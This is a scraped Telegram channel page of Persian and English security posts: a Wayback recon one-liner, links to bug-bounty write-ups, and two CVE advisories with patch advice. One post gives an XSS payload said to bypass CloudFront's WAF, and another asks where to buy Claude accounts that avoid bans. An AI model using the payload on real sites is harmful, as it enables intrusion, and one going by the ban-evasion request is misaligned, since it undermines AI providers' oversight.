ch
Feedback
World Of Security

World Of Security

前往频道在 Telegram
5 028
订阅者
+724 小时
+987
+23430
帖子存档
Local AI for Penetration Testing & Research جالب بود https://projectblack.io/blog/local-ai-for-cyber-security/

دوستان ربات تلگرامی میشناسید که اکانت کلاد بفروشه ولی بن نشه .... @nashenas_tm می‌دونم تضمینی نیست ولی اگر از جایی خریدید و بن نشدید پیشنهاد بدید ممنون

https://youtu.be/HPKfd7Muusg?is=0oW-0VMP0lp712fY اولین ویدیو کانال ما ممنون میشم حمایت کنید.

البته این یک مثال ساده از بروت لاجیک بود. امکلا ایده اینه که شما بیایی هرچقدر که میتونی همه چیز رو برای خودتون بهینه کنید. بعضی وقت ها میبینم که بعضی از دوستان مدت هاست که دارن وقت میزارن رو یک ابزار ریکان خفن بدون دانش صحیح ریکان و متدولوژی مناسب ریکان.

Wayback URL Recon - One Liner curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=origi
Wayback URL Recon - One Liner curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//' | sort -u

XSS: Bypass CloudFront WAF <object/data="javascript:alert/**/(document.domain)">//</object>

Client-Side Path Traversal (CSPT) — How Deleting a Spam Post Deleted the Org Owner's Own Content Instead https://blog.captinsharky.com/post.php?slug=cspt-forced-post-deletion

Reading Anyone's Private Meta AI Conversations — Without Authentication https://j4eva.io/blog/meta-ai-idor

گروه پرسش و پاسخ

کشف زنجیره آسیب‌پذیری جدید: root کردن اندروید ۱۷ از طریق فایرفاکس! گزارش‌های جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر می‌دهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد می‌کند. این اکسپلویت از یک آسیب‌پذیری روز صفر (0-day) استفاده می‌کند. 🔹 جزئیات کلیدی: شناسه آسیب‌پذیری: CVE-2026-10702 هدف: مرورگر فایرفاکس در اندروید (نسخه‌های قبل از v151.0.2) سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستم‌عامل (Kernel) 🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاه‌های اندرویدی خود استفاده می‌کنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینک‌های مشکوک خودداری نمایید.

🚨 آسیب‌پذیری افشای اطلاعات در پلاگین وردپرسی Gravity SMTP باگی با شناسه CVE-2026-4020 کشف شده که به مهاجمین اجازه می‌ده بدون نیاز به احراز هویت (Unauthenticated) به اطلاعات حساسی مثل API Tokens و Keys دسترسی پیدا کنن. این آسیب‌پذیری به شدت تحت اکسپلویت فعاله؛ اگر از این افزونه استفاده می‌کنید، فوراً اون رو به نسخه 2.1.5 آپدیت کنید. ⚠️ چون ممکنه قبل از آپدیت، اطلاعات شما به سرقت رفته باشه پیشنهاد می‌شه تمامی توکن‌ها و API keyهای مربوط رو باطل و با موارد جدید جایگزین کنید. https://thehackernews.com/2026/06/hackers-exploit-gravity-smtp-wordpress.html?m=1

The ultimate Bug Bounty guide to HTTP request smuggling vulnerabilities https://www.yeswehack.com/learn-bug-bounty/http-request-smuggling-guide-vulnerabilities

دوستان جایزه این ctf رو به زودی به برنده می‌دیم ببخشید خوردیم به جنگ. برای ctf بعدی با جایزه آماده باشید

Android reverse engineering entirely on-device. Radare2 binary analysis, 8 Java decompilers, Flutter & Unity il2cpp support https://github.com/UltraSina/androidReverse

دوستان کسی از deepseek api استفاده کرده ؟؟؟ اگر گزینه بهتری دارید لطفاً بگید بیشتر استفاده ام برای offensive هست به همین دلیل توکن سوزی بالاست تقریبا می‌خوام چیزی باشه هم به صرفه باشه و هم قیمت مناسبی داشته باشه اگر پیشنهادی دارید حتما بگید ممنون میشم.